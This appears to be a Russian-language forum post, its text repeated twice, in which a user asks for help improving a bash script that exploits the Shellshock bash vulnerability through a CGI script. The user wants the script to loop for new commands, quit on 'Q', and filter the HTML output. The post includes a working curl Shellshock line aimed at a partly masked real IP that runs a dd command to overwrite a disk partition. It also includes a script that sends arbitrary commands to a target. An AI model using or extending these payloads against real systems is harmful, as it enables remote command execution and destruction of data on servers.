traceme
28.07.2015, 20:39
Всем здравия!
Есть вопрос по приведению в порядок скрипта для использования уязвимости, может даже кто-то поделится своим)
Метасплоит не всегда бывает под рукой да и его установка не везде возможна, а башем можно пользоваться почти везде где если линукс.
Вот пример работы shellshock
curl -i --insecure https://**.181.32.92/cgi-bin/index.cgi -A "() { :;};echo;dd if=/dev/random of=/dev/sda1 bs=4k"
Вот "пример" скрипта
echo "Enter URI to cgi"
read vuln_cgi
echo "Enter cmd"
read send_cmd
curl -i -A "() { :;};echo;$send_cmd" $vuln_cgi
Вопрос:
Как после ввода команды для выполнения через shellshock скрипт не завершался, а ждал ввода новой команды
Также хотелось бы сделать выход из скрипта, например если ввести "Q"
Также столкнулся с проблемой , когда при выполнении запроса через уязвимость, после выполнения команды выводится код самого cgi скрипта и получается очень неудобно читать нужную часть вывода.
Есть ли возможность выводить текст , но до появления, например, "DOCTYPE" чтобы отсечь шелуху.
Есть вопрос по приведению в порядок скрипта для использования уязвимости, может даже кто-то поделится своим)
Метасплоит не всегда бывает под рукой да и его установка не везде возможна, а башем можно пользоваться почти везде где если линукс.
Вот пример работы shellshock
curl -i --insecure https://**.181.32.92/cgi-bin/index.cgi -A "() { :;};echo;dd if=/dev/random of=/dev/sda1 bs=4k"
Вот "пример" скрипта
echo "Enter URI to cgi"
read vuln_cgi
echo "Enter cmd"
read send_cmd
curl -i -A "() { :;};echo;$send_cmd" $vuln_cgi
Вопрос:
Как после ввода команды для выполнения через shellshock скрипт не завершался, а ждал ввода новой команды
Также хотелось бы сделать выход из скрипта, например если ввести "Q"
Также столкнулся с проблемой , когда при выполнении запроса через уязвимость, после выполнения команды выводится код самого cgi скрипта и получается очень неудобно читать нужную часть вывода.
Есть ли возможность выводить текст , но до появления, например, "DOCTYPE" чтобы отсечь шелуху.